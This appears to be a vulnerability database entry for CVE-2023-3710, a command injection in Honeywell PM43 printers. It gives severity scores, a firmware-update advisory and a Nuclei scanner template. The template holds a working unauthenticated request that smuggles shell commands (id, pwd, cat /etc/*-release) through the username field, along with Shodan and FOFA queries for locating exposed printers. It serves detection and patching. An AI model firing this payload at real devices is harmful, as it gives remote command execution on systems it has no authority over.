Honeywell PM43 Printers - Command Injection

2023-10-1513:57:25

ProjectDiscovery

github.com

cve2023

honeywell

pm43

printer

iot

rce

command

validation

firmware

32bit

arm

web

module

update

latest

CVSS3

9.9

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H

AI Score

9.8

Confidence

High

EPSS

0.797

Percentile

98.3%

JSON

Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006)

id: CVE-2023-3710

info:
  name: Honeywell PM43 Printers - Command Injection
  author: win3zz
  severity: critical
  description: |
    Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006)
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3710
    - https://github.com/vpxuser/CVE-2023-3710-POC
    - https://twitter.com/win3zz/status/1713451282344853634
    - https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwaresignedP1019050004
    - https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwarexasignedP1019050004A
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-3710
    cwe-id: CWE-77,CWE-20
    epss-score: 0.70969
    epss-percentile: 0.98042
    cpe: cpe:2.3:o:honeywell:pm43_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: honeywell
    product: pm43_firmware
    shodan-query: http.html:"/main/login.lua?pageid="
    fofa-query: body="/main/login.lua?pageid="
  tags: cve2023,cve,honeywell,pm43,printer,iot,rce

http:
  - raw:
      - |
        POST /loadfile.lp?pageid=Configure HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)'

      - type: word
        part: body
        words:
          - 'Release date'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205c5a80d771051373a8c6b0c2ca248ca734e5ee7408acfd6d2fb3c85902d221fb0221008f595d668911595afa24a9370d94dfb8fec9e8ce381ef47016acd2dc70a53914:922c64590222798bb761d5b6d8e72950